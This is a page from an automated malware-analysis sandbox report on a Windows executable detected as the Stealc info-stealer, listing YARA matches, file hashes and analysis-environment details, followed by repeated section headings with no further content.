Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1544998
Product:	CloudBasic
Start time:	00:19:06
Start date:	30.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b2d5f7c5a51b55bfe094dbe2a60da2e3
SHA1:	ace802a1a1b603e5361c2f3a2b4b5361b3358186
SHA256:	a117df022325ff641b44e0d81f794e83d259764a0c82e52edb471a89b3f75370
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by